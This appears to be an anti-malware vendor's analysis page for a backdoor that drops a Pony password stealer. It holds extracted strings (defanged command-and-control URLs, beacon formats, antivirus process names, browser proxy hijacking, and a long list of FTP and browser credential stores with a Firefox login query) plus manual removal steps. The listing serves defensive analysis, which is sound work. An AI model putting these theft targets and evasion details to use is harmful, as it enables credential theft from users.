{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
milktoyoustudios.com
hXXp://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=112&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\5AD5
.text
`.rdata
@.data
.rsrc
U"m%c
.Vg?/Z
&%u}&
COMCTL32.dll
IPHLPAPI.DLL
SETUPAPI.dll
SHELL32.dll
KERNEL32.dll
GetProcessHeap
9]^%xr
%$%Xi
y%O%u)
*-%s#)
^.PR"
GetCPInfo
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumChildWindows
EnumWindows
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpenRequest
.PRfc=
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

%original file name%.exe_1156_rwx_00400000_00068000:

`.rsrc
PSSh$
SSShkU@
SSSh!
SSj%S
jHh8%D
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://zonedg.com/index.html
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=112
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
renamesys5.com
givishoolstome.com
limfoklubs.com
regfeedbackaccess.com
umbrella-systems1.com
monymouses.com
onlinepdahelpforyou.com
remarkreddomas.com
transfersakkonline.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
hXXp://%s.%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
hXXp://armoredlegion.com/305986.png
hXXp://armoredlegion.com/16354.png
hXXp://armoredlegion.com/716354_m61.png
hXXp://mektek.net/thelab/wiley.jpg
hXXp://knowledgesutra.com/img/temp/hi.cgi
hXXp://knowledgesutra.com/img/temp/head.png
hXXp://battleon.com/134.gif
hXXp://battleon.com/132.gif
hXXp://battleon.com/133.gif
hXXp://browsermmorpg.com/images/cpc.png
hXXp://browsermmorpg.com/images/cpc2.png
hXXp://browsermmorpg.com/img/intel.gif
hXXp://browsermmorpg.com/img/intel.jpg
hXXp://012webpages.com/christian12.jpg
hXXp://012webpages.com/christian13.jpg
hXXp://012webpages.com/christian14.jpg
hXXp://tri-countymech.com/g/livechat.png
hXXp://tri-countymech.com/g/logo.png
hXXp://tri-countymech.com/g/133.jpg
hXXp://tri-countymech.com/g/134.jpg
hXXp://electronicstheory.com/pics/valley.png
hXXp://electronicstheory.com/pics/sun.png
hXXp://classicbattletech.com/lhous3.gif
hXXp://classicbattletech.com/lhous4.gif
hXXp://classicbattletech.com/lhous5.gif
hXXp://classicbattletech.com/lhous6.gif
hXXp://engineeringcrossing.com/images/misc/23525.png
hXXp://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
POST %s HTTP/1.1
Content-Length: %u
HTTP/1.0 200 OK
HTTP/1.1 200 OK
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
ahst.lni
milktoyoustudios.com
hXXp://%s/s.php?c=121&id=%s
bigbulkhypnocrys.com
hXXp://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
hXXp://%s%s
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=112&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\5AD5
.text
`.rdata
@.data
.rsrc
U"m%c
.Vg?/Z
&%u}&
COMCTL32.dll
IPHLPAPI.DLL
SETUPAPI.dll
SHELL32.dll
KERNEL32.dll
GetProcessHeap
9]^%xr
%$%Xi
y%O%u)
*-%s#)
^.PR"
GetCPInfo
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumChildWindows
EnumWindows
WinHttpOpen
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpenRequest
.PRfc=
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

6.tmp_1676:

.text
`.rdata
@.data
.rsrc
More information: hXXp://VVV.ibsensoftware.com/
hXXp://TRANSERSDATAFORME.COM/gate.php
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
crypt32.dll
w.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
ole32.dll
advapi32.dll
kernel32.dll
{X-X-X-XX-XXXXXX}
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Password
\wcx_PTF.ini
\GHISLER\wcx_PTF.ini
Software\Ghisler\Windows Commander
FtpIniName
\Ipswitch\WS_FTP
\win.ini
WS_FTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
\Sites.dat
\Quick.dat
\History.dat
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Port
Server.Host
Server.User
Server.Pass
Server.Port
Last Server Pass
Last Server Port
FTP Navigator
FTP Commander
ftplist.txt
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
addrbk.dat
\TurboFTP
Software\TurboFTP
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
FtpSite.xml
\sites.xml
\FTPRush
RushSite.xml
FtpPort
Software\Cryer\WebSitePublisher
bitkinex.ds
\drives.js
"password" : "
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpServer
FtpUserName
FtpPassword
_FtpPassword
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
\SharedSettings.ccs
\SharedSettings.sqlite
leapftp
unleap.exe
sites.dat
sites.ini
\LeapWare\LeapFTP
PortNumber
\32BitFtp.ini
NDSites.ini
PassWord
Software\South River Technologies\WebDrive\Connections
FTP CONTROL
FTPCON
hXXp://
hXXps://
PTF://
opera
wand.dat
Software\Opera Software
Opera.HTML\shell\open\command
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
wiseftpsrvs.ini
wisePTF.ini
FTPVoyager.ftp
FTPVoyager.qc
\RhinoSoft.com
nss3.dll
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
mozsqlite3.dll
profiles.ini
PathToExe
signons.sqlite
signons.txt
signons2.txt
signons3.txt
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
Firefox
\Mozilla\Firefox\
Software\Mozilla
fireFTPsites.dat
SeaMonkey
\Mozilla\SeaMonkey\
Mozilla
\Mozilla\Profiles\
Software\LeechFTP
bookmark.dat
SiteInfo.QFP
WinFTP
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
MS IE FTP Passwords
pstorec.dll
SiteServer %d\Host
SiteServer %d\WebUrl
SiteServer %d\Remote Directory
SiteServer %d-User
SiteServer %d-User PW
%s\Keychain
DeluxeFTP
sites.xml
Web Data
Login Data
SQLite format 3
logins
origin_url
password_value
\Google\Chrome
\ChromePlus
Software\ChromePlus
\Nichrome
Staff-FTP
SM.arch
FreshFTP
BlazeFtp
site.dat
LastPassword
LastPort
Software\FlashPeak\BlazeFtp\Settings
FTP  .Link\shell\open\command
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
password 51:b:
FTP Now
SOFTWARE\Wow6432Node\Robo-FTP 3.7\Scripts
SOFTWARE\Wow6432Node\Robo-FTP 3.7\FTPServers
FTP Count
FTP File%d
STATUS-IMPORT-OK
shell32.dll
;3 #>6.&
'2, / 0&7!4-)1#
GetWindowsDirectoryA
user32.dll
RegOpenKeyExA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
RegEnumKeyExA
InternetCrackUrlA
InternetCreateUrlA
wininet.dll
shlwapi.dll
wsock32.dll
y%O%u)
*-%s#)
^.PR"
1, 0, 0, 1(
Pony.rc

6.tmp_1676_rwx_0014C000_0000F000:

ocuments and Settings\"%CurrentUserName%"\My Documents\My Pictures\*.*
ocuments and Settings\"%CurrentUserName%"\My Documents\My Music\*.*
ocuments and Settings\"%CurrentUserName%"\Application Data\NetSarang\*.*
TRANSERSDATAFORME.COM
ware\Mozilla\
INDOWS\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\Setup.exe /repair /x86 /parameterfolder Client
%SystemRoot%\system32\mswsock.dll
{3C3901C5-3455-3E0A-A214-0B093A5070A6}Microsoft .NET Framework 4 Client Profile
{50D9586D-EA16-4953-BD8F-3DA51E1D1543}ActivePerl 5.16.2 Build 1602
{95140000-00AF-0409-0000-0000000FF1CE}Microsoft PowerPoi
%System%\Macromed\Flash\FlashUtil32_11_6_602_168_ActiveX.exe -maintain activex
"%WinDir%\$NtUninstallKB898461$\spuninst\spuninst.exe"
%WinDir%\Microsoft.NET\Framework\v3.5\Microsoft .NET Framework 3.5\setup.exe
%WinDir%\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\Setup.exe /repair /x86 /parameterfolder Client
rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 %WinDir%\INF\PCHealth.inf
c:\totalcmd\tcuninst.exe
%Program Files%\WinPcap\uninstall.exe
"%Program Files%\Wireshark\uninstall.exe"
MsiExec.exe /X{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}
MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216018FF}
MsiExec.exe /I{2BA00471-0328-3743-93BD-FA813353A783}
MsiExec.exe /I{2FC099BD-AC9B-33EB-809C-D332E1B27C40}
MsiExec.exe /X{39F48F01-4B74-46F2-8251-C5957A343D71}
MsiExec.exe /X{3C3901C5-3455-3E0A-A214-0B093A5070A6}
MsiExec.exe /I{50D9586D-EA16-4953-BD8F-3DA51E1D1543}
MsiExec.exe /X{95140000-00AF-0409-0000-0000000FF1CE}
MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-A93000000001}
MsiExec.exe /I{B508B3F1-A24A-32C0-B310-85786919EF28}
temRoot%\system32\mswsock.dll
am Files\WinPcap\uninstall.exe
MsiExec.exe
KB898461Update for Windows XP (KB898461)
Microsoft .NET Framework 3.5Microsoft .NET Framework 3.5
Microsoft .NET Framework 4 Client ProfileMicrosoft .NET Framework 4 Client Profile
TotalcmdTotal Commander (Remove or Repair)
WinPcapInstWinPcap 4.0.1
WiresharkWireshark 0.99.6a
{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}Microsoft Visual C   2008 Redistributable - x86 9.0.30729.4148
{26A24AE4-039D-4CA4-87B4-2F83216018FF}Java(TM) 6 Update 18
{2BA00471-0328-3743-93BD-FA813353A783}Microsoft .NET Framework 3.0 Service Pack 1
{2FC099BD-AC9B-33EB-809C-D332E1B27C40}Microsoft .NET Framework 3.5
{39F48F01-4B74-46F2-8251-C5957A343D71}VMware Tools
{95140000-00AF-0409-0000-0000000FF1CE}Microsoft PowerPoint Viewer
{AC76BA86-7AD7-1033-7B44-A93000000001}Adobe Reader 9.3.4
{B508B3F1-A24A-32C0-B310-85786919EF28}Microsoft .NET Framework 2.0 Service Pack 1
|%SystemRoot%\system32\rsvpsp.dll
%SystemRoot%\system32\rsvpsp.dll
%SystemRoot%\system32\vsocklib.dll
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat
ocuments and Settings\All Users\Application Data\SiteDesigner\*.*
ocuments and Settings\"%CurrentUserName%"\My Documents\*.*
NDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
%WinDir%\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\
Tcpip
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files
CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}
istory\FTPHost
MSAFD Tcpip [TCP/IP]
MSAFD NetBIOS [\Device\NetBT_Tcpip_{FA3B3797-8A29-4E30-9B14-9ECEA8F69703}] DATAGRAM 2
%SystemRoot%\System32\mswsock.dll
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\{E1070104-F404-44CE-B556-0622F9D63EE5}
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{EEEE69B8-2C42-4825-B8E6-9597957D672B}] SEQPACKET 3
MSAFD NetBIOS [\Device\NetBT_Tcpip_{EEEE69B8-2C42-4825-B8E6-9597957D672B}] DATAGRAM 3
MSAFD NetBIOS [\Device\NetBT_Tcpip_{E1070104-F404-44CE-B556-0622F9D63EE5}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{E1070104-F404-44CE-B556-0622F9D63EE5}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{BF770B77-F559-4142-BC28-45811EFECA81}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{BF770B77-F559-4142-BC28-45811EFECA81}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{FA3B3797-8A29-4E30-9B14-9ECEA8F69703}] SEQPACKET 2
ce\NetBT_Tcpip_{FA3B3797-8
4E30-9B14-9ECEA8F69703}] D
%SystemRoot%\System32\winrnr.dll
\??\%WinDir%\win.ini
%WinDir%\win.ini
WS_FTP
\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
egistry\Machine\Software\Classes\FTP  .Link\shell\open\command
sses\Interface\{93F2F68C-1D1B-11D3-A30E-00C04F79ABD1}\ProxyStubClsid32
GDIPFO~1.DATGDIPFONTCACHE
IdentitiesPass
%WinDir%\Registration\R000000000007.clb

6.tmp_1676_rwx_00400000_00015000:

.text
`.rdata
@.data
.rsrc
More information: hXXp://VVV.ibsensoftware.com/
hXXp://TRANSERSDATAFORME.COM/gate.php
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
crypt32.dll
w.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
ole32.dll
advapi32.dll
kernel32.dll
{X-X-X-XX-XXXXXX}
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Password
\wcx_PTF.ini
\GHISLER\wcx_PTF.ini
Software\Ghisler\Windows Commander
FtpIniName
\Ipswitch\WS_FTP
\win.ini
WS_FTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
\Sites.dat
\Quick.dat
\History.dat
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Port
Server.Host
Server.User
Server.Pass
Server.Port
Last Server Pass
Last Server Port
FTP Navigator
FTP Commander
ftplist.txt
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
addrbk.dat
\TurboFTP
Software\TurboFTP
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
FtpSite.xml
\sites.xml
\FTPRush
RushSite.xml
FtpPort
Software\Cryer\WebSitePublisher
bitkinex.ds
\drives.js
"password" : "
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpServer
FtpUserName
FtpPassword
_FtpPassword
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
\SharedSettings.ccs
\SharedSettings.sqlite
leapftp
unleap.exe
sites.dat
sites.ini
\LeapWare\LeapFTP
PortNumber
\32BitFtp.ini
NDSites.ini
PassWord
Software\South River Technologies\WebDrive\Connections
FTP CONTROL
FTPCON
hXXp://
hXXps://
PTF://
opera
wand.dat
Software\Opera Software
Opera.HTML\shell\open\command
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
wiseftpsrvs.ini
wisePTF.ini
FTPVoyager.ftp
FTPVoyager.qc
\RhinoSoft.com
nss3.dll
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
mozsqlite3.dll
profiles.ini
PathToExe
signons.sqlite
signons.txt
signons2.txt
signons3.txt
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
Firefox
\Mozilla\Firefox\
Software\Mozilla
fireFTPsites.dat
SeaMonkey
\Mozilla\SeaMonkey\
Mozilla
\Mozilla\Profiles\
Software\LeechFTP
bookmark.dat
SiteInfo.QFP
WinFTP
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
MS IE FTP Passwords
pstorec.dll
SiteServer %d\Host
SiteServer %d\WebUrl
SiteServer %d\Remote Directory
SiteServer %d-User
SiteServer %d-User PW
%s\Keychain
DeluxeFTP
sites.xml
Web Data
Login Data
SQLite format 3
logins
origin_url
password_value
\Google\Chrome
\ChromePlus
Software\ChromePlus
\Nichrome
Staff-FTP
SM.arch
FreshFTP
BlazeFtp
site.dat
LastPassword
LastPort
Software\FlashPeak\BlazeFtp\Settings
FTP  .Link\shell\open\command
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
password 51:b:
FTP Now
SOFTWARE\Wow6432Node\Robo-FTP 3.7\Scripts
SOFTWARE\Wow6432Node\Robo-FTP 3.7\FTPServers
FTP Count
FTP File%d
STATUS-IMPORT-OK
shell32.dll
;3 #>6.&
'2, / 0&7!4-)1#
GetWindowsDirectoryA
user32.dll
RegOpenKeyExA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
RegEnumKeyExA
InternetCrackUrlA
InternetCreateUrlA
wininet.dll
shlwapi.dll
wsock32.dll
1, 0, 0, 1(
Pony.rc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1176
    %original file name%.exe:352

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %System%\config\SOFTWARE.LOG (3302 bytes)
    %System%\config\software (1164 bytes)
    %Program Files%\LP\5AD5\5.exe (43 bytes)
    %Program Files%\LP\5AD5\6.tmp (12588 bytes)
    %Program Files%\LP\5AD5\C29.exe (273074 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (5052 bytes)
    %Program Files%\LP\5AD5\7.exe (43 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "C29.exe" = "%Program Files%\LP\5AD5\C29.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

